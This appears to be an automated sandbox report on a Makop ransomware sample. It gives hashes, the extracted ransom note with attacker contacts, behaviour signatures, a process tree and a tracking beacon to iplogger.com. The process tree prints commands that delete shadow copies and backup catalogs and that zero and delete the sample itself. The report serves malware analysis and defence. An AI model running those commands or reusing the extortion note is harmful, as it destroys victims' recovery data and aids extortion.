Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    18/02/2024, 14:45 UTC

General

  • Target

    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe

  • Size

    42KB

  • MD5

    52b1171ccd66ff02c2947927300d9c33

  • SHA1

    eeb6ef1830ed9b6c8838bcf398c878525a421e23

  • SHA256

    a043cf14c1e9bb9e6fcbf8a3302acf7e7c46dfeaa40ed7a1c6d31d17ab40a261

  • SHA512

    26e27833e0197073867fadc4d4493ffaf69b4e4bb3e68c0b6e55bc88a1222fa0f0a520c303ef15961e46ffb297aa1305d8f5221dfc9a275c5eb258c35049b88a

  • SSDEEP

    768:EO1oR/6VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDqW52BqwLnTZpk1M:E2S1FKnDtkuImngBqwLTZy1M

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay us. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: cyberrestore2024@onionmail.org Or you can contact us via TOX: 2045F43C36CF86051CC7129C1FF74E84BCDC7A527C059676E546F58A1D8DF94B3C47F17F2E54 You can download TOX client here: https://qtox.github.io/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don't want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
Emails

cyberrestore2024@onionmail.org

URLs

https://qtox.github.io/

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (8322) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe" n1948
      2⤵
        PID:2180
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2360
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          3⤵
          • Deletes backup catalog
          PID:2772
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2932
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\PING.EXE
          ping 1.1.1.1 -n 5
          3⤵
          • Runs ping.exe
          PID:1520
        • C:\Windows\SysWOW64\fsutil.exe
          fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
          3⤵
            PID:2212
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2764
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2680
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:2376
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    PID:1664
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    PID:1704

Network

  • US
    DNS
    iplogger.com
    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    Remote address: 8.8.8.8:53
    Request
    iplogger.com IN A
    Response
    iplogger.com IN A 104.21.76.57
    iplogger.com IN A 172.67.188.178
  • US
    GET
    https://iplogger.com/1VpeH4
    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    Remote address: 104.21.76.57:443
    Request
    GET /1VpeH4 HTTP/1.1
    Referer: 1D7BA18E;2.25
    Host: iplogger.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sun, 18 Feb 2024 14:46:21 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: 416940421502943035=3; expires=Tue, 18 Feb 2025 14:46:21 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
    set-cookie: clhf03028ja=89.149.23.59; expires=Tue, 18 Feb 2025 14:46:21 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
    memory: 0.42227935791015625
    expires: Sun, 18 Feb 2024 14:46:21 +0000
    Cache-Control: no-store, no-cache, must-revalidate
    strict-transport-security: max-age=604800
    strict-transport-security: max-age=31536000
    content-security-policy: img-src https: data:; upgrade-insecure-requests
    x-frame-options: SAMEORIGIN
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vluBRWy4CIZ5PUb%2FKq2CnQMakQdAji0H7AW6u2euGnBSiq%2B7h0dK%2BCGbOcI15eRAASBnHFa0wKYTnJ4%2FURzBG6W5JREb6IAQERUhPojkdnTsTNEctE5c6lZ1SPPWvY8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 85770f21ef247753-LHR
    alt-svc: h3=":443"; ma=86400
  • 104.21.76.57:443
    https://iplogger.com/1VpeH4
    tls, http
    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    1.0kB
    7.3kB
    12
    12

    HTTP Request

    GET https://iplogger.com/1VpeH4

    HTTP Response

    200
  • 8.8.8.8:53
    iplogger.com
    dns
    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    58 B
    90 B
    1
    1

    DNS Request

    iplogger.com

    DNS Response

    104.21.76.57
    172.67.188.178

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

    Filesize

    1KB

    MD5

    4cd9a7d10732ce6c99aedabfba1d8d64

    SHA1

    6575eb09c5acd181935311dfc6621a2b2d2ac0c9

    SHA256

    bbdbd67b963a725d054682be52c8c7d83610b73ba1ce7b9c230847f228a2188d

    SHA512

    e2deede94446730170f749977991c6e97eb65c7c80052e029a864e202cffd29eab913377ad924f6d712c5568e29e42cd94afde03c374d8ef23ed3ac80fe676a1
